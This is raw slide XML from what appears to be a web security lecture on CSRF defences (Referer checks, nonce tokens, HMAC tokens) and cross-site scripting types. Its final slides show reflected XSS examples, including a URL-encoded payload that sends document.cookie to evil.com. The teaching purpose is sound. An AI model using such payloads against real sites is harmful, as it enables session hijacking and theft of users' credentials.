              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(sic) headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Remember </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> headers from last week?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Idea: only accept POST requests that were referred from your own site.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Problem: Users can’t navigate to your site with URL bar or a bookmark (or even a link mailed to a friend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>).  Can be fixed with open access “landing pages”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Problem: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> can be spoofed with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>XMLHTTPRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> objects in older browsers, Flash,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6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Ineffective solutions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Checking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(sic) headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Remember </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> headers from last week?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Idea: only accept POST requests that were referred from your own site.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Problem: Users can’t navigate to your site with URL bar or a bookmark (or even a link mailed to a friend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>).  Can be fixed with open access “landing pages”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Problem: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> can be spoofed with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>XMLHTTPRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> objects in older browsers, Flash,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267200" y="2895600"/>
            <a:ext cx="3276600" cy="1003041"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -66486"/>
              <a:gd name="adj2" fmla="val -11149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An okay idea, just not as a front-line defense.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7257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Ineffective solutions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>URL Rewriting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Idea: avoid the automatic sending of cookies by embedding the session key in the URL of every request.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Problems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Session fixation (remember that?)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Having your session ID in view of shoulder surfers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Having your session ID appear in other web sites’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> logs.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956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solutions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Base problem: cookies are the sole authentication mechanism.  Therefore, require something else besides a cookie in addition to the cookie.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Idea: server embeds a hidden field in every </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>POSTed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> form that contains a cryptographically strong </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>nonce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(number used once).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962400" y="4648200"/>
            <a:ext cx="4191000" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 37930"/>
              <a:gd name="adj2" fmla="val -14188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 “shared secret” solution.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807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solutions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Base problem: cookies are the sole authentication mechanism.  Therefore, require something else besides a cookie in addition to the cookie.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Idea: server embeds a hidden field in every </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>POSTed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> form that contains a cryptographically strong </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>nonce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(number used once).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8153400" cy="2667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"good"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post"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/>
              </a:rPr>
              <a:t>   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"http://your.bank.com/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transfer.php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amt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"50"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"to"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"31337"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"nonce"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"E1obLFflJOSV4eUkR3CfYrBDYidvx5FkNniW0yYiuu3ASO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BGxz1dEFHAmmvJWEQ2ngblOVdTVzkH1bXTqFGe7Q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=="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Transfer"&gt;</a:t>
            </a:r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endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="16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3270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solutions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Base problem: cookies are the sole authentication mechanism.  Therefore, require something else besides a cookie in addition to the cookie.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Idea: server embeds a hidden field in every </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>POSTed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> form that contains a cryptographically strong </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>nonce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(number used once).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8153400" cy="2667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"good"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post"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/>
              </a:rPr>
              <a:t>   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"http://your.bank.com/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transfer.php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amt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"50"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"to"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"31337"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"nonce"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"E1obLFflJOSV4eUkR3CfYrBDYidvx5FkNniW0yYiuu3ASO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BGxz1dEFHAmmvJWEQ2ngblOVdTVzkH1bXTqFGe7Q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=="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Transfer"&gt;</a:t>
            </a:r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endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
            </a:endParaRP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990600" y="1524000"/>
            <a:ext cx="4191000" cy="1676400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -3035"/>
              <a:gd name="adj2" fmla="val 11893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Bank generates this form and stores the nonce in its databases associated with the user’s ID.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906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solutions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Base problem: cookies are the sole authentication mechanism.  Therefore, require something else besides a cookie in addition to the cookie.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Idea: server embeds a hidden field in every </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>POSTed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> form that contains a cryptographically strong </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>nonce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(number used once).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8153400" cy="2667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"good"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post"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/>
              </a:rPr>
              <a:t>   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"http://your.bank.com/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transfer.php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amt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"50"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"to"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"31337"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"nonce"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"E1obLFflJOSV4eUkR3CfYrBDYidvx5FkNniW0yYiuu3ASO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BGxz1dEFHAmmvJWEQ2ngblOVdTVzkH1bXTqFGe7Q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=="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Transfer"&gt;</a:t>
            </a:r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endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
            </a:endParaRP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990600" y="1524000"/>
            <a:ext cx="4191000" cy="1676400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -3035"/>
              <a:gd name="adj2" fmla="val 11893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Bank generates this form and stores the nonce in its databases associated with the user’s ID.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2602" y="1017036"/>
            <a:ext cx="4308410" cy="2127380"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -44183"/>
              <a:gd name="adj2" fmla="val 10841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When the form is submitted, the received nonce is checked against the stored nonce.  Match means accept, missing or different means reject.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457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solutions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Base problem: cookies are the sole authentication mechanism.  Therefore, require something else besides a cookie in addition to the cookie.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Idea: server embeds a hidden field in every </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>POSTed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> form that contains a cryptographically strong </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>nonce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(number used once).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8153400" cy="2667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"good"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post"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/>
              </a:rPr>
              <a:t>   action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"http://your.bank.com/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transfer.php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amt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"50"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"text"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"to"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"31337" /&gt;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"hidden"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"nonce" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean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"E1obLFflJOSV4eUkR3CfYrBDYidvx5FkNniW0yYiuu3ASO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BGxz1dEFHAmmvJWEQ2ngblOVdTVzkH1bXTqFGe7Q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=="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Transfer"&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000F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endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
            </a:endParaRP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990600" y="1524000"/>
            <a:ext cx="4191000" cy="1676400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -3035"/>
              <a:gd name="adj2" fmla="val 11893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Bank generates this form and stores the nonce in its databases associated with the user’s ID.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2602" y="1017036"/>
            <a:ext cx="4308410" cy="2127380"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -44183"/>
              <a:gd name="adj2" fmla="val 10841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When the form is submitted, the received nonce is checked against the stored nonce.  Match means accept, missing or different means reject.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086100" y="5257800"/>
            <a:ext cx="3969398" cy="1421364"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -43948"/>
              <a:gd name="adj2" fmla="val -82618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Remember: this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>number is used only once and then discarded!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55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solutions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Base problem: cookies are the sole authentication mechanism.  Therefore, require something else besides a cookie in addition to the cookie.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Idea: server embeds a hidden field in every </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>POSTed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> form that contains a cryptographically strong </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>nonce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(number used once).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962400" y="4561114"/>
            <a:ext cx="3969398" cy="1421364"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 39735"/>
              <a:gd name="adj2" fmla="val -91808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Incidentally, the nonce also prevents the double-submit problem.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300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solution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No need to keep a separate nonce.  Instead, use the session ID itself as a token.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Remember HMAC from last week?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352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27391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stolen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Just about anything that a JavaScript program can access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Form fields (including password fields)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cookies (proxies for authentication)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Keystrokes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Mouse events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Basically everything on the page or in the DOM.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31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solution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No need to keep a separate nonce.  Instead, use the session ID itself as a token.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Remember HMAC from last week?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352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4648200"/>
            <a:ext cx="3657600" cy="1752600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -3738"/>
              <a:gd name="adj2" fmla="val -9986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K: secret key text from the server (padded to block size if smaller or the hash of the key if it is longer)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343400" y="1905000"/>
            <a:ext cx="3124200" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -107434"/>
              <a:gd name="adj2" fmla="val 7416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m: the message to be authenticated.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602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solution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No need to keep a separate nonce.  Instead, use the session ID itself as a token.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Remember HMAC from last week?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352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2362200" y="4343400"/>
            <a:ext cx="5105400" cy="1447800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -47418"/>
              <a:gd name="adj2" fmla="val -8293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Now, construct </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean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 to be the cookie-based session ID concatenated onto the URL of the action to be taken.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1416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solution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No need to keep a separate nonce.  Instead, use the session ID itself as a token.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Remember HMAC from last week?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352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HMAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0" err="1"/>
              <a:t>K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0" err="1"/>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>) =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opad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>) ∥ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0"/>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0"/>
              <a:t>K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> ⊕ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0" err="1"/>
              <a:t>ipad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>) ∥ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0"/>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>))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2362200" y="4343400"/>
            <a:ext cx="5105400" cy="1447800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -47418"/>
              <a:gd name="adj2" fmla="val -8293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Now, construct </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean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 to be the cookie-based session ID concatenated onto the URL of the action to be taken.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810000" y="1066800"/>
            <a:ext cx="3962400" cy="2090410"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -99223"/>
              <a:gd name="adj2" fmla="val 6391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Use the calculated HMAC as the “nonce” token.  It won’t need to be stored on the server since it can be recalculated instead!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7241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considerations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Preventing CSRF also means preventing XSS.  Otherwise, XSS could be used to steal the nonce just like the session ID cookie.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Consider making users re-authenticate (username and password) when performing a sensitive operation such as a password change, a transfer of funds, etc., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>thereby preventing CSRF.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925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95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</a:p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4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it accomplished</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>User-supplied data is pushed back to other users (or the same user) without encoding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Three ways</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Reflected XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Local XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Stored XSS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572000" y="4038600"/>
            <a:ext cx="3200400" cy="1467472"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -97314"/>
              <a:gd name="adj2" fmla="val -67689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Differentiating local from reflected is subtle…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4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Input sent in one request is immediately reflected in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971800"/>
            <a:ext cx="8077200" cy="6096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latin typeface="Consolas"/>
              </a:rPr>
              <a:t>http://www.somesite.com/search?q=A%20%3Cb%3Etest%3C%2Fb%3E</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin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80" y="3872204"/>
            <a:ext cx="4434840" cy="60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5638800" y="4038600"/>
            <a:ext cx="3200400" cy="1713723"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -71658"/>
              <a:gd name="adj2" fmla="val -8402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Notice that the %3C was interpreted as &lt; and %3E as &gt; yielding bold tags.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0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Input sent in one request is immediately reflected in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971800"/>
            <a:ext cx="8077200" cy="7620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latin typeface="Consolas"/>
              </a:rPr>
              <a:t>http://www.somesite.com/search?q=</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>  %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>3Cscript%3Ealert(%22xss%22)%3B%3C%2Fscript%3E</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Times New Roman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638800" y="4038601"/>
            <a:ext cx="3200400" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -57075"/>
              <a:gd name="adj2" fmla="val -8938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Now we replace the HTML with a script.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962400"/>
            <a:ext cx="390525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097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Reflected XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Input sent in one request is immediately reflected in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971800"/>
            <a:ext cx="8077200" cy="1295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latin typeface="Consolas"/>
              </a:rPr>
              <a:t>http://www.somesite.com/search?q=</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>   %3Cscript%3Edocument.write(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>22%3Cimg%20src%3D%27http</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>  %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>3A%2F%2Fevil.com%2Fxss%3F%22%2Bencode(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>  %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>2B%22%27%2F%3E%22)%3B%3C%2Fscript%3E%0A</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Times New Roman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524000" y="4572000"/>
            <a:ext cx="7010400" cy="1295399"/>
          </a:xfrm>
